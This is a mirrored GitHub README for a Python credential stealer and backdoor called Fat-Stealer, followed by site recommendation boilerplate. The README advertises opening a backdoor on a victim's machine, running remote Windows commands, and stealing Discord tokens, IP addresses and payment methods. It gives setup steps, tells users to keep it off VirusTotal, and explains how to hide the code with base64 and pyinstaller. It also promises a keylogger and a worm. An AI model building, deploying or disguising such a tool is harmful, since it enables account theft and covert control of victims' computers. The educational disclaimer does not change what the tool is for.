Git Product home page Git Product logo

stealer--nashiito's Introduction

Stealer

Fat-Stealer is a stealer that allows you to open a Backdoor in the victims machine and grab some info from Discord such as token, IP, name. When the victim opens it a black screen will appear... Simple stealer in Beta phase wirtten in python. More features will be available soon.

Terms

  • Use this tool for educational purposes only.
  • Reselling is proibihited.
  • You can't skid this project, don't be a skid :)

Installation

Clone the repo:

git clone https://github.com/Nashiito3/Stealer--Nashiito

Go to the directory:

cd Stealer--Nashiito

Edit the required files

Run:

python3 main.py

Install requirements:

pip install -r requirements.txt

If you are using Windows:

python main.py

The tool is not completely automated so you have to change manually the IP, PORT and WebHook. It will be automated soon.

Features

  • Open a Backdoor
  • Allows to send windows commands through a Server script.
  • Grab discord token.
  • Black Screen
  • Only 6/64 Detections in Virustotal.com (Please do not upoload it there).
  • Grab IP.
  • Who am I function.
  • Get payment method.

Soon

I will be adding this in a future, if the repo is starred.

  • Stored passwords grabber
  • Worm function
  • Functional game
  • Keylogger
  • Premium version

How to disguise?

So as we all know, Python is quite difficult to obfuscate. However, there are a few methods. First of all you can encode it (base64, etc.) + compile it. Or just compile it without encodings python -m py_compile malware.py (or use pyinstaller pip install pyinstaller, pyinstaller -w --onefile malware.py). If it's encoded and compiled, it'll be more difficult to find any actual code there, or extract anything else. If it's just compiled, the victim might be able to find something useful, but it still makes it a bit difficult, he won't be able to see the actual code.

Contact

You can dm on discord: !Jet#0728 Please notify me all the "undocumented features" (bugs)

Disclaimer

I'm not responsible of any of your acts, this tool has been created for educational purposes.

Please look into the code to understand the concept and how it works.

stealer--nashiito's People

Contributors

nashiito3 avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.